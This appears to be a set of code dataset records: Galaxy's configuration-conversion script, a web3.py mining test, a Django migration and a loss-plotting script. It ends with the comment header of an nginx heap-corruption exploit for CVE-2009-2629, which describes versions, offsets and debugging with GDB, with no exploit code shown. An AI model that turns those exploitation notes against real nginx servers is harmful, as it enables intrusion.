] | 1 | 2021-02-27T19:54:49.000Z | 2021-02-27T19:54:49.000Z | lib/galaxy/config/config_manage.py | NordicESMhub/galaxy | ec3ffb7d8ec5dac9b179f4c9d39b8060b69d5492 | [
"CC-BY-3.0"
] | 78 | 2019-01-18T08:12:49.000Z | 2022-03-13T08:56:41.000Z | lib/galaxy/config/config_manage.py | NordicESMhub/galaxy | ec3ffb7d8ec5dac9b179f4c9d39b8060b69d5492 | [
"CC-BY-3.0"
] | 9 | 2019-01-18T07:49:12.000Z | 2021-06-26T22:21:09.000Z | import argparse
import os
import shutil
import string
import sys
import tempfile
from io import StringIO
from textwrap import TextWrapper
from typing import Any, List, NamedTuple
import requests
import yaml
from boltons.iterutils import remap
try:
from pykwalify.core import Core
except ImportError:
Core = None
if __name__ == '__main__':
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir)))
from galaxy.config import GALAXY_CONFIG_SCHEMA_PATH
from galaxy.config.schema import (
AppSchema,
OPTION_DEFAULTS,
Schema,
)
from galaxy.util import safe_makedirs
from galaxy.util.properties import nice_config_parser
from galaxy.util.yaml_util import (
ordered_dump,
ordered_load,
)
DESCRIPTION = "Convert configuration files."
APP_DESCRIPTION = """Application to target for operation (i.e. galaxy, tool_shed, or reports))"""
DRY_RUN_DESCRIPTION = """If this action modifies files, just print what would be the result and continue."""
UNKNOWN_OPTION_MESSAGE = "Option [%s] not found in schema - either it is invalid or the Galaxy team hasn't documented it. If invalid, you should manually remove it. If the option is valid but undocumented, please file an issue with the Galaxy team."
USING_SAMPLE_MESSAGE = "Path [%s] not a file, using sample."
EXTRA_SERVER_MESSAGE = "Additional server section after [%s] encountered [%s], will be ignored."
MISSING_FILTER_TYPE_MESSAGE = "Missing filter type for section [%s], it will be ignored."
UNHANDLED_FILTER_TYPE_MESSAGE = "Unhandled filter type encountered [%s] for section [%s]."
NO_APP_MAIN_MESSAGE = "No app:main section found, using application defaults throughout."
YAML_COMMENT_WRAPPER = TextWrapper(initial_indent="# ", subsequent_indent="# ", break_long_words=False, break_on_hyphens=False)
RST_DESCRIPTION_WRAPPER = TextWrapper(initial_indent=" ", subsequent_indent=" ", break_long_words=False, break_on_hyphens=False)
UWSGI_SCHEMA_PATH = "lib/galaxy/webapps/uwsgi_schema.yml"
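# Defaults for the 'uwsgi:' section of the generated sample YAML; $-placeholders in desc/default are filled per app in _build_sample_yaml().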
UWSGI_OPTIONS = dict([
('http', {
'desc': """The address and port on which to listen. By default, only listen to localhost ($app_name will not be accessible over the network). Use ':$default_port' to listen on all available network interfaces.""",
'default': '127.0.0.1:$default_port',
'type': 'str',
}),
('buffer-size', {
'desc': """By default uWSGI allocates a very small buffer (4096 bytes) for the headers of each request. If you start receiving "invalid request block size" in your logs, it could mean you need a bigger buffer. We recommend at least 16384.""",
'default': 16384,
'type': 'int',
}),
('processes', {
'desc': """Number of web server (worker) processes to fork after the application has loaded. If this is set to greater than 1, thunder-lock likely should be enabled below.""",
'default': 1,
'type': 'int',
}),
('threads', {
'desc': """Number of threads for each web server process.""",
'default': 4,
'type': 'int',
}),
('offload-threads', {
'desc': """Number of threads for serving static content and handling internal routing requests.""",
'default': 2,
'type': 'int',
}),
('static-map.1', {
'key': 'static-map',
'desc': """Mapping to serve static content.""",
'default': '/static=static',
'type': 'str',
}),
('static-map.2', {
'key': 'static-map',
'desc': """Mapping to serve the favicon.""",
'default': '/favicon.ico=static/favicon.ico',
'type': 'str',
}),
('static-safe', {
'key': 'static-safe',
'desc': """Allow serving certain assets out of `client`. Most modern Galaxy interfaces bundle all of this, but some older pages still serve these via symlink, requiring this rule.""",
'default': 'client/src/assets',
'type': 'str',
}),
('master', {
'desc': """Enable the master process manager. Disabled by default for maximum compatibility with CTRL+C, but should be enabled for use with --daemon and/or production deployments.""",
'default': False,
'type': 'bool',
}),
('virtualenv', {
'desc': """Path to the application's Python virtual environment. If using Conda for Galaxy's framework dependencies (not tools!), do not set this.""",
'default': '.venv',
'type': 'str',
}),
('pythonpath', {
'desc': """Path to the application's Python library.""",
'default': 'lib',
'type': 'str',
}),
('module', {
'desc': """The entry point which returns the web application (e.g. Galaxy, Reports, etc.) that you are loading.""",
'default': '$uwsgi_module',
'type': 'str',
}),
('#mount', {
'desc': """Mount the web application (e.g. Galaxy, Reports, etc.) at the given URL prefix. Cannot be used together with 'module:' above.""",
'default': '/galaxy=$uwsgi_module',
'type': 'str',
}),
('manage-script-name', {
'desc': """Make uWSGI rewrite PATH_INFO and SCRIPT_NAME according to mount-points. Set this to true if a URL prefix is used.""",
'default': False,
'type': 'bool',
}),
('thunder-lock', {
'desc': """It is usually a good idea to set this to ``true`` if processes is greater than 1.""",
'default': False,
'type': 'bool',
}),
('die-on-term', {
'desc': """Cause uWSGI to respect the traditional behavior of dying on SIGTERM (its default is to brutally reload workers)""",
'default': True,
'type': 'bool',
}),
('hook-master-start.1', {
'key': 'hook-master-start',
'desc': """Cause uWSGI to gracefully reload workers and mules upon receipt of SIGINT (its default is to brutally kill workers)""",
'default': 'unix_signal:2 gracefully_kill_them_all',
'type': 'str',
}),
('hook-master-start.2', {
'key': 'hook-master-start',
'desc': """Cause uWSGI to gracefully reload workers and mules upon receipt of SIGTERM (its default is to brutally kill workers)""",
'default': 'unix_signal:15 gracefully_kill_them_all',
'type': 'str',
}),
('py-call-osafterfork', {
'desc': """Feature necessary for proper mule signal handling on Python versions below 3.7.2. The default is set to false to prevent a runtime error under Python 3.7.2 and newer (see https://github.com/unbit/uwsgi/issues/1978).""",
'default': False,
'type': 'bool',
}),
('enable-threads', {
'desc': """Ensure application threads will run if `threads` is unset.""",
'default': True,
'type': 'bool',
}),
('umask', {
'desc': """uWSGI default umask. On some systems uWSGI has a default umask of 000, for Galaxy a somewhat safer default is chosen. If Galaxy submits jobs as real user then all users needs to be able to read the files, i.e. the umask needs to be '022' or the Galaxy users need to be in the same group as the Galaxy system user""",
'default': '027',
'type': 'str',
}),
# ('route-uri', {
# 'default': '^/proxy/ goto:proxy'
# }),
# ('route', {
# 'default': '.* last:'
# }),
# ('route-label', {
# 'default': 'proxy'
# }),
# ('route-run', {
# 'default': 'rpcvar:TARGET_HOST galaxy_dynamic_proxy_mapper ${HTTP_HOST} ${cookie[galaxysession]}'
# }),
# ('route-run', {
# 'default': "['log:Proxy ${HTTP_HOST} to ${TARGET_HOST}', 'httpdumb:${TARGET_HOST}']",
# }),
# ('http-raw-body', {
# 'default': True
# }),
])
SHED_ONLY_UWSGI_OPTIONS = [('cron', {
'desc': """Task for rebuilding Toolshed search indexes using the uWSGI cron-like interface.""",
'default': "0 -1 -1 -1 -1 python scripts/tool_shed/build_ts_whoosh_index.py -c config/tool_shed.yml --config-section tool_shed",
'type': 'str',
})]
DROP_OPTION_VALUE = object()
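# DROP_OPTION_VALUE is a sentinel an option action can return to omit that option from the converted config;
# each _OptionAction subclass below defines how a legacy option is treated by the 'convert' and 'lint' actions.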
class _OptionAction:
def converted(self, args, app_desc, key, value):
pass
def lint(self, args, app_desc, key, value):
pass
class _DeprecatedAction(_OptionAction):
def lint(self, args, app_desc, key, value):
print(f"Option [{key}] has been deprecated, this will likely be dropped in future releases of Galaxy.")
class _DeprecatedAndDroppedAction(_OptionAction):
def converted(self, args, app_desc, key, value):
print(f"Option [{key}] has been deprecated and dropped. It is not included in converted configuration.")
return DROP_OPTION_VALUE
def lint(self, args, app_desc, key, value):
print(f"Option [{key}] has been deprecated. Option should be dropped without replacement.")
class _PasteAppFactoryAction(_OptionAction):
def converted(self, args, app_desc, key, value):
if value not in app_desc.expected_app_factories:
raise Exception(f"Ending convert process - unknown paste factory encountered [{value}]")
return DROP_OPTION_VALUE
def lint(self, args, app_desc, key, value):
if value not in app_desc.expected_app_factories:
print(f"Problem - unknown paste app factory encountered [{value}]")
class _ProductionUnsafe(_OptionAction):
def __init__(self, unsafe_value):
self.unsafe_value = unsafe_value
def lint(self, args, app_desc, key, value):
if str(value).lower() == str(self.unsafe_value).lower():
template = "Problem - option [%s] should not be set to [%s] in production environments - it is unsafe."
message = template % (key, value)
print(message)
class _ProductionPerformance(_OptionAction):
def lint(self, args, app_desc, key, value):
template = "Problem - option [%s] should not be set to [%s] in production environments - it may cause performance issues or instability."
message = template % (key, value)
print(message)
class _HandleFilterWithAction(_OptionAction):
def converted(self, args, app_desc, key, value):
print("filter-with converted to prefixed module load of uwsgi module, dropping from converted configuration")
return DROP_OPTION_VALUE
class _RenameAction(_OptionAction):
def __init__(self, new_name):
self.new_name = new_name
def converted(self, args, app_desc, key, value):
return (self.new_name, value)
def lint(self, args, app_desc, key, value):
template = "Problem - option [%s] has been renamed (possibly with slightly different behavior) to [%s]."
message = template % (key, self.new_name)
print(message)
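# Legacy option names mapped to the special handling they need during conversion and linting.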
OPTION_ACTIONS = {
'use_beaker_session': _DeprecatedAndDroppedAction(),
'use_interactive': _DeprecatedAndDroppedAction(),
'session_type': _DeprecatedAndDroppedAction(),
'session_data_dir': _DeprecatedAndDroppedAction(),
'session_key': _DeprecatedAndDroppedAction(),
'session_secret': _DeprecatedAndDroppedAction(),
'paste.app_factory': _PasteAppFactoryAction(),
'filter-with': _HandleFilterWithAction(),
'debug': _ProductionUnsafe(True),
'serve_xss_vulnerable_mimetypes': _ProductionUnsafe(True),
'use_printdebug': _ProductionUnsafe(True),
'id_secret': _ProductionUnsafe('USING THE DEFAULT IS NOT SECURE!'),
'master_api_key': _ProductionUnsafe('changethis'),
'external_service_type_config_file': _DeprecatedAndDroppedAction(),
'external_service_type_path': _DeprecatedAndDroppedAction(),
'enable_sequencer_communication': _DeprecatedAndDroppedAction(),
'run_workflow_toolform_upgrade': _DeprecatedAndDroppedAction(),
# Next 4 were from library search which is no longer available.
'enable_lucene_library_search': _DeprecatedAndDroppedAction(),
'fulltext_max_size': _DeprecatedAndDroppedAction(),
'fulltext_noindex_filetypes': _DeprecatedAndDroppedAction(),
'fulltext_url': _DeprecatedAndDroppedAction(),
'enable_beta_job_managers': _DeprecatedAndDroppedAction(),
'enable_legacy_sample_tracking_api': _DeprecatedAction(),
'enable_new_user_preferences': _DeprecatedAndDroppedAction(),
'force_beta_workflow_scheduled_for_collections': _DeprecatedAction(),
'force_beta_workflow_scheduled_min_steps': _DeprecatedAction(),
'history_local_serial_workflow_scheduling': _ProductionPerformance(),
'allow_library_path_paste': _RenameAction("allow_path_paste"),
'trust_ipython_notebook_conversion': _RenameAction("trust_jupyter_notebook_conversion"),
'enable_beta_tool_command_isolation': _DeprecatedAndDroppedAction(),
'enable_beta_ts_api_install': _DeprecatedAndDroppedAction(),
'single_user': _ProductionUnsafe(True),
'tool_submission_burst_threads': _DeprecatedAndDroppedAction(),
'tool_submission_burst_at': _DeprecatedAndDroppedAction(),
'toolform_upgrade': _DeprecatedAndDroppedAction(),
'enable_beta_mulled_containers': _DeprecatedAndDroppedAction(),
'enable_communication_server': _DeprecatedAndDroppedAction(),
'communication_server_host': _DeprecatedAndDroppedAction(),
'communication_server_port': _DeprecatedAndDroppedAction(),
'persistent_communication_rooms': _DeprecatedAndDroppedAction(),
'legacy_eager_objectstore_initialization': _DeprecatedAndDroppedAction(),
}
class App(NamedTuple):
config_paths: List[str]
default_port: str
expected_app_factories: List[str]
destination: str
schema_path: str
uwsgi_module: str
@property
def app_name(self):
return os.path.splitext(os.path.basename(self.destination))[0]
@property
def sample_destination(self):
return self.destination + ".sample"
@property
def schema(self):
return AppSchema(self.schema_path, self.app_name)
class OptionValue(NamedTuple):
name: str
value: Any
option: Any
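# Per-application metadata (config locations, default port, schema, uwsgi module) for the apps this script can manage.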
GALAXY_APP = App(
["universe_wsgi.ini", "config/galaxy.ini"],
"8080",
["galaxy.web.buildapp:app_factory"], # TODO: Galaxy could call factory a few different things and they'd all be fine.
"config/galaxy.yml",
GALAXY_CONFIG_SCHEMA_PATH,
'galaxy.webapps.galaxy.buildapp:uwsgi_app()',
)
SHED_APP = App(
["tool_shed_wsgi.ini", "config/tool_shed.ini"],
"9009",
["tool_shed.webapp.buildapp:app_factory"],
"config/tool_shed.yml",
"lib/tool_shed/webapp/config_schema.yml",
'tool_shed.webapp.buildapp:uwsgi_app()',
)
REPORTS_APP = App(
["reports_wsgi.ini", "config/reports.ini"],
"9001",
["galaxy.webapps.reports.buildapp:app_factory"],
"config/reports.yml",
"lib/galaxy/webapps/reports/config_schema.yml",
'galaxy.webapps.reports.buildapp:uwsgi_app()',
)
APPS = {"galaxy": GALAXY_APP, "tool_shed": SHED_APP, "reports": REPORTS_APP}
def main(argv=None):
"""Entry point for conversion process."""
if argv is None:
argv = sys.argv[1:]
args = _arg_parser().parse_args(argv)
app_name = args.app
app_desc = APPS.get(app_name)
action = args.action
action_func = ACTIONS[action]
action_func(args, app_desc)
def _arg_parser():
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument('action', metavar='ACTION', type=str,
choices=list(ACTIONS.keys()),
help='action to perform')
parser.add_argument('app', metavar='APP', type=str, nargs="?",
help=APP_DESCRIPTION)
parser.add_argument('--add-comments', default=False, action="store_true")
parser.add_argument('--dry-run', default=False, action="store_true",
help=DRY_RUN_DESCRIPTION)
parser.add_argument('--galaxy_root', default=".", type=str)
return parser
def _to_rst(args, app_desc, heading_level="~"):
rst = StringIO()
schema = app_desc.schema
for key, value in schema.app_schema.items():
default = None if "default" not in value else value["default"]
if default is True:
default = "true"
elif default is False:
default = "false"
option = schema.get_app_option(key)
option_value = OptionValue(key, default, option)
_write_option_rst(args, rst, key, heading_level, option_value)
print(rst.getvalue())
def _write_option_rst(args, rst, key, heading_level, option_value):
title = f"``{key}``"
heading = heading_level * len(title)
rst.write(f"{heading}\n{title}\n{heading}\n\n")
option, value = _parse_option_value(option_value)
desc = _get_option_desc(option)
rst.write(":Description:\n")
# Wrap and indent desc, replacing whitespaces with a space, except
# for double newlines which are replaced with a single newline.
rst.write("\n".join("\n".join(RST_DESCRIPTION_WRAPPER.wrap(_)) for _ in desc.split("\n\n")) + "\n")
type = option.get("type", None)
default = option.get("default", "*null*")
if default is True:
default = "true"
elif default is False:
default = "false"
elif default == "":
default = '""'
rst.write(f":Default: ``{default}``\n")
if type:
rst.write(f":Type: {type}\n")
rst.write("\n\n")
def _build_uwsgi_schema(args, app_desc):
req = requests.get('https://raw.githubusercontent.com/unbit/uwsgi-docs/master/Options.rst')
rst_options = req.text
last_line = None
current_opt = None
options = {}
option = None
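    # Scrape uwsgi's Options.rst: a line consisting only of asterisks marks the preceding line as an option name.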
for line in rst_options.splitlines():
line = line.strip()
dots = "*" * len(line)
if line and (line == dots):
current_opt = last_line
option = {
'type': 'any',
}
options[current_opt] = option
if line.startswith("``parser``"):
parser = line.split(":", 1)[1].strip()
if parser == "uwsgi_opt_set_int":
option["type"] = "int"
            # TODO: dispatch on parser...
elif line.startswith("``help``"):
option["desc"] = line.split(":", 1)[1]
last_line = line
schema = {
"type": "map",
"desc": "uwsgi definition, see https://uwsgi-docs.readthedocs.io/en/latest/Options.html",
"mapping": options
}
path = os.path.join(args.galaxy_root, UWSGI_SCHEMA_PATH)
contents = ordered_dump(schema)
_write_to_file(args, contents, path)
def _find_config(args, app_desc):
path = os.path.join(args.galaxy_root, app_desc.destination)
if not os.path.exists(path):
path = None
for possible_ini_config_rel in app_desc.config_paths:
possible_ini_config = os.path.join(args.galaxy_root, possible_ini_config_rel)
if os.path.exists(possible_ini_config):
path = possible_ini_config
    if path is None:
        _warn(USING_SAMPLE_MESSAGE % os.path.join(args.galaxy_root, app_desc.destination))
path = os.path.join(args.galaxy_root, app_desc.sample_destination)
return path
def _find_app_options(app_desc, path):
"""Load app (as opposed to server) options from specified path.
Supplied ``path`` may be either YAML or ini file.
"""
if _is_ini(path):
p = nice_config_parser(path)
app_items = _find_app_options_from_config_parser(p)
else:
raw_config = _order_load_path(path)
app_items = raw_config.get(app_desc.app_name, None) or {}
return app_items
def _find_app_options_from_config_parser(p):
if not p.has_section("app:main"):
_warn(NO_APP_MAIN_MESSAGE)
app_items = {}
else:
app_items = dict(p.items("app:main"))
return app_items
def _lint(args, app_desc):
path = _find_config(args, app_desc)
if not os.path.exists(path):
raise Exception(f"Expected configuration file [{path}] not found.")
app_items = _find_app_options(app_desc, path)
for key, value in app_items.items():
option_action = OPTION_ACTIONS.get(key)
if option_action is not None:
option_action.lint(args, app_desc, key, value)
def _validate(args, app_desc):
if Core is None:
raise Exception("Cannot validate file, pykwalify is not installed.")
path = _find_config(args, app_desc)
# Allow empty mapping (not allowed by pykwalify)
raw_config = _order_load_path(path)
if raw_config.get(app_desc.app_name) is None:
raw_config[app_desc.app_name] = {}
# Rewrite the file any way to merge any duplicate keys
with tempfile.NamedTemporaryFile('w', delete=False, suffix=".yml") as config_p:
ordered_dump(raw_config, config_p)
def _clean(p, k, v):
return k not in ['reloadable', 'path_resolves_to', 'per_host']
clean_schema = remap(app_desc.schema.raw_schema, _clean)
with tempfile.NamedTemporaryFile('w', suffix=".yml") as fp:
ordered_dump(clean_schema, fp)
fp.flush()
c = Core(
source_file=config_p.name,
schema_files=[fp.name],
)
os.remove(config_p.name)
c.validate()
class PrefixFilter:
def __init__(self, name, prefix):
self.name = name
self.prefix = prefix
class GzipFilter:
def __init__(self, name):
self.name = name
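# Convert a legacy ini config: paste server/filter sections become the 'uwsgi' block, app:main options become the app's own YAML section.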
def _run_conversion(args, app_desc):
ini_config = _find_config(args, app_desc)
if ini_config and not _is_ini(ini_config):
_warn(f"Cannot convert YAML file {ini_config}, this option is only for ini config files.")
sys.exit(1)
elif not ini_config:
_warn("Failed to find a config to convert - exiting without changes.")
sys.exit(1)
p = nice_config_parser(ini_config)
server_section = None
filters = {}
for section in p.sections():
if section.startswith("server:"):
if server_section:
_warn(EXTRA_SERVER_MESSAGE % (server_section, section))
else:
server_section = section
if section.startswith("filter:"):
filter_name = section[len("filter:"):]
filter_type = p.get(section, "use")
if filter_type is None:
                message = MISSING_FILTER_TYPE_MESSAGE % section
_warn(message)
continue
if filter_type == "egg:PasteDeploy#prefix":
prefix = p.get(section, "prefix")
filters[filter_name] = PrefixFilter(filter_name, prefix)
elif filter_type == "egg:Paste#gzip":
filters[filter_name] = GzipFilter(filter_name)
else:
message = UNHANDLED_FILTER_TYPE_MESSAGE % (filter_type, section)
_warn(message)
continue
if not server_section:
_warn("No server section found, using default uwsgi server definition.")
server_config = {}
else:
server_config = dict(p.items(server_section))
app_items = _find_app_options_from_config_parser(p)
applied_filters = []
if filters:
for key, value in app_items.items():
if key == "filter-with":
if value in filters:
applied_filters.append(filters[value])
else:
_warn(f"Unknown filter found [{value}], exiting...")
sys.exit(1)
uwsgi_dict = _server_paste_to_uwsgi(app_desc, server_config, applied_filters)
app_dict = {}
schema = app_desc.schema
for key, value in app_items.items():
if key in ["__file__", "here"]:
continue
if key in OPTION_ACTIONS:
option_action = OPTION_ACTIONS.get(key)
new_value = option_action.converted(args, app_desc, key, value)
if new_value:
if isinstance(new_value, tuple):
key, value = new_value
else:
value = new_value
if value is DROP_OPTION_VALUE:
continue
option = schema.get_app_option(key)
if option["unknown_option"]:
_warn(UNKNOWN_OPTION_MESSAGE % key)
option_value = OptionValue(key, value, option)
app_dict[key] = option_value
f = StringIO()
_write_section(args, f, "uwsgi", uwsgi_dict, uwsgi_hack=True)
_write_section(args, f, app_desc.app_name, app_dict)
destination = os.path.join(args.galaxy_root, app_desc.destination)
_replace_file(args, f, app_desc, ini_config, destination)
def _is_ini(path):
return path.endswith(".ini") or path.endswith(".ini.sample")
def _replace_file(args, f, app_desc, from_path, to_path):
_write_to_file(args, f, to_path)
backup_path = f"{from_path}.backup"
print(f"Moving [{from_path}] to [{backup_path}]")
if args.dry_run:
print("... skipping because --dry-run is enabled.")
else:
shutil.move(from_path, backup_path)
def _build_sample_yaml(args, app_desc):
if app_desc.app_name in ["tool_shed"]:
UWSGI_OPTIONS.update(SHED_ONLY_UWSGI_OPTIONS)
schema = app_desc.schema
f = StringIO()
for value in UWSGI_OPTIONS.values():
for field in ["desc", "default"]:
if field not in value:
continue
field_value = value[field]
if not isinstance(field_value, str):
continue
new_field_value = string.Template(field_value).safe_substitute(**{
'default_port': str(app_desc.default_port),
'app_name': app_desc.app_name,
'uwsgi_module': app_desc.uwsgi_module,
})
value[field] = new_field_value
description = getattr(schema, "description", None)
if description:
description = description.lstrip()
as_comment = "\n".join(f"# {line}" for line in description.split("\n")) + "\n"
f.write(as_comment)
_write_sample_section(args, f, 'uwsgi', Schema(UWSGI_OPTIONS), as_comment=False, uwsgi_hack=True)
_write_sample_section(args, f, app_desc.app_name, schema)
destination = os.path.join(args.galaxy_root, app_desc.sample_destination)
_write_to_file(args, f, destination)
def _write_to_file(args, f, path):
if hasattr(f, "getvalue"):
contents = f.getvalue()
else:
contents = f
if args.dry_run:
contents_indented = "\n".join(f" |{line}" for line in contents.splitlines())
print(f"Overwriting {path} with the following contents:\n{contents_indented}")
print("... skipping because --dry-run is enabled.")
else:
print(f"Overwriting {path}")
safe_makedirs(os.path.dirname(path))
with open(path, "w") as to_f:
to_f.write(contents)
def _order_load_path(path):
"""Load (with ``_ordered_load``) on specified path (a YAML file)."""
with open(path) as f:
# Allow empty mapping (not allowed by pykwalify)
raw_config = ordered_load(f, merge_duplicate_keys=True)
return raw_config
def _write_sample_section(args, f, section_header, schema, as_comment=True, uwsgi_hack=False):
_write_header(f, section_header)
for key, value in schema.app_schema.items():
default = None if "default" not in value else value["default"]
option = schema.get_app_option(key)
option_value = OptionValue(key, default, option)
# support uWSGI "dumb YAML parser" (unbit/uwsgi#863)
key = option.get('key', key)
_write_option(args, f, key, option_value, as_comment=as_comment, uwsgi_hack=uwsgi_hack)
def _write_section(args, f, section_header, section_dict, uwsgi_hack=False):
_write_header(f, section_header)
for key, option_value in section_dict.items():
_write_option(args, f, key, option_value, uwsgi_hack=uwsgi_hack)
def _write_header(f, section_header):
f.write(f"{section_header}:\n\n")
def _write_option(args, f, key, option_value, as_comment=False, uwsgi_hack=False):
option, value = _parse_option_value(option_value)
desc = _get_option_desc(option)
comment = ""
if desc and args.add_comments:
# Wrap and comment desc, replacing whitespaces with a space, except
# for double newlines which are replaced with a single newline.
comment += "\n".join("\n".join(YAML_COMMENT_WRAPPER.wrap(_)) for _ in desc.split("\n\n")) + "\n"
as_comment_str = "#" if as_comment else ""
if uwsgi_hack:
if option.get("type", "str") == "bool":
value = str(value).lower()
key_val_str = f"{key}: {value}"
else:
key_val_str = yaml.dump({key: value}, width=float("inf")).lstrip("{").rstrip("\n}")
lines = f"{comment}{as_comment_str}{key_val_str}"
lines_idented = "\n".join(f" {line}" for line in lines.split("\n"))
f.write(f"{lines_idented}\n\n")
def _parse_option_value(option_value):
if isinstance(option_value, OptionValue):
option = option_value.option
value = option_value.value
# Hack to get nicer YAML values during conversion
if option.get("type", "str") == "bool":
value = str(value).lower() == "true"
elif option.get("type", "str") == "int":
value = int(value)
else:
value = option_value
option = OPTION_DEFAULTS
return option, value
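# Translate a Paste 'server:' section (host, port, threadpool) plus any applied filters into equivalent uwsgi settings.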
def _server_paste_to_uwsgi(app_desc, server_config, applied_filters):
uwsgi_dict = {}
port = server_config.get("port", app_desc.default_port)
host = server_config.get("host", "127.0.0.1")
if server_config.get("use", "egg:Paste#http") != "egg:Paste#http":
raise Exception("Unhandled paste server 'use' value [%s], file must be manually migrate.")
uwsgi_dict["http"] = f"{host}:{port}"
# default changing from 10 to 8
uwsgi_dict["threads"] = int(server_config.get("threadpool_workers", 8))
# required for static...
uwsgi_dict["http-raw-body"] = True
uwsgi_dict["offload-threads"] = 8
# Handle paste filters during conversion.
prefix = None
for applied_filter in applied_filters:
if isinstance(applied_filter, PrefixFilter):
prefix = applied_filter.prefix
break
elif isinstance(applied_filter, GzipFilter):
uwsgi_dict["http-auto-gzip"] = True
if prefix:
uwsgi_dict["mount"] = f"{prefix}={app_desc.uwsgi_module}"
uwsgi_dict["manage-script-name"] = True
else:
uwsgi_dict["module"] = app_desc.uwsgi_module
return uwsgi_dict
def _warn(message):
print(f"WARNING: {message}")
def _get_option_desc(option):
desc = option["desc"]
parent_dir = option.get("path_resolves_to")
if parent_dir:
path_resolves = f"The value of this option will be resolved with respect to <{parent_dir}>."
return f"{desc}\n{path_resolves}" if desc else path_resolves
return desc
ACTIONS = {
"convert": _run_conversion,
"build_sample_yaml": _build_sample_yaml,
"validate": _validate,
"lint": _lint,
"build_uwsgi_yaml": _build_uwsgi_schema,
"build_rst": _to_rst,
}
if __name__ == '__main__':
main()
| 37.070743 | 335 | 0.651486 |
4a2252420746a170f170b96ea1728172c00445a9 | 562 | py | Python | tests/core/testing-module/test_testing_mine.py | pjryan93/web3.py | e066452a7b0e78d6cb8a9462532d169de901ef99 | [
"MIT"
] | 326 | 2016-04-29T21:51:06.000Z | 2022-03-31T03:20:54.000Z | tests/core/testing-module/test_testing_mine.py | pjryan93/web3.py | e066452a7b0e78d6cb8a9462532d169de901ef99 | [
"MIT"
] | 283 | 2016-04-15T16:41:31.000Z | 2017-11-28T16:41:36.000Z | tests/core/testing-module/test_testing_mine.py | pjryan93/web3.py | e066452a7b0e78d6cb8a9462532d169de901ef99 | [
"MIT"
] | 146 | 2016-04-14T16:27:54.000Z | 2021-10-03T13:31:07.000Z | def test_testing_mine_single_block(web3):
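    # Mining one block should advance the "latest" block number by exactly one.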
web3.testing.mine()
before_mining_block = web3.eth.getBlock("latest")
web3.testing.mine()
after_mining_block = web3.eth.getBlock("latest")
assert after_mining_block['number'] - before_mining_block['number'] == 1
def test_testing_mine_multiple_blocks(web3):
web3.testing.mine()
before_mining_block = web3.eth.getBlock("latest")
web3.testing.mine(5)
after_mining_block = web3.eth.getBlock("latest")
assert after_mining_block['number'] - before_mining_block['number'] == 5
| 24.434783 | 76 | 0.725979 |
4a2252b18cda01ae784a7a8137bb4a8c0f912163 | 1,108 | py | Python | python/cm/migrations/0044_auto_20200115_1058.py | AKhodus/adcm | 98dbf22af3f1c6afa94505e9acaff0ac4088a602 | [
"Apache-2.0"
] | 16 | 2019-11-28T18:05:21.000Z | 2021-12-08T18:09:18.000Z | python/cm/migrations/0044_auto_20200115_1058.py | AKhodus/adcm | 98dbf22af3f1c6afa94505e9acaff0ac4088a602 | [
"Apache-2.0"
] | 1,127 | 2019-11-29T08:57:25.000Z | 2022-03-31T20:21:32.000Z | python/cm/migrations/0044_auto_20200115_1058.py | AKhodus/adcm | 98dbf22af3f1c6afa94505e9acaff0ac4088a602 | [
"Apache-2.0"
] | 10 | 2019-11-28T18:05:06.000Z | 2022-01-13T06:16:40.000Z | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Generated by Django 2.2.9 on 2020-01-15 10:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cm', '0043_auto_20200109_1600'),
]
operations = [
migrations.AddField(
model_name='action',
name='allow_to_terminate',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='stageaction',
name='allow_to_terminate',
field=models.BooleanField(default=True),
),
]
| 31.657143 | 74 | 0.675993 |
4a22538efb683f33e27cff8de2582765825a9b9f | 364 | py | Python | AITRexRush/Algorithm_1/VisLoss.py | 2360673637/AIGames | 7d149cc2cff8fa626ee1c9e1ad7c39e1a724a5bb | [
"MIT"
] | 2 | 2019-03-23T13:58:34.000Z | 2019-03-23T13:59:07.000Z | AITRexRush/Algorithm_1/VisLoss.py | 2360673637/AIGames | 7d149cc2cff8fa626ee1c9e1ad7c39e1a724a5bb | [
"MIT"
] | null | null | null | AITRexRush/Algorithm_1/VisLoss.py | 2360673637/AIGames | 7d149cc2cff8fa626ee1c9e1ad7c39e1a724a5bb | [
"MIT"
] | 1 | 2018-10-25T07:51:52.000Z | 2018-10-25T07:51:52.000Z | # Loss可视化
# 作者: Charles
# 公众号: Charles的皮卡丘
import pickle
from matplotlib import pyplot as plt
with open('./logger/loss.pkl', 'rb') as f:
loss_dict = pickle.load(f)
times = []
losses = []
for time, loss in loss_dict.items():
times.append(time)
losses.append(loss)
plt.title('Loss trend')
plt.xlabel('Time')
plt.ylabel('Loss')
plt.plot(times, losses)
plt.show() | 19.157895 | 42 | 0.703297 |
4a225510a2083489b5b4a196ea4848288cb81e65 | 7,299 | py | Python | ngix.py | CodingLi/test2 | 0e5c0047ee6cbc96e66a2e96fe32477ffb8a8a08 | [
"Apache-2.0"
] | null | null | null | ngix.py | CodingLi/test2 | 0e5c0047ee6cbc96e66a2e96fe32477ffb8a8a08 | [
"Apache-2.0"
] | null | null | null | ngix.py | CodingLi/test2 | 0e5c0047ee6cbc96e66a2e96fe32477ffb8a8a08 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# Exploit Title: nginx heap corruption
# Date: 08/26/2010
# Author: aaron conole <[email protected]>
# Software Link: http://nginx.org/download/nginx-0.6.38.tar.gz
# Version: <= 0.6.38, <= 0.7.61
# Tested on: BT4R1 running nginx 0.6.38 locally
# CVE: 2009-2629
#
# note: this was written and tested against BT4. This means it's an
# intel x86 setup (ie: offsets for 32-bit machine, etc.). YMMV
# also - only tested successfully against nginx 0.6.38
# you'll definitely need to modify against other versions
#
# you'll need to know where the offset is going to land, and what the pad is
# from that point to when you've tained execution flow.
#
# A quick way to find out just for verification would be to launch nginx,
# attach GDB to the worker and target it with the exploit, setting the offset
# to 0, or some other arbitrary value. It should crash on a piece of code which
# resembles:
# if (ctx->offset)
#
# At that point, merely dump the *r; capture the value for the data pointer
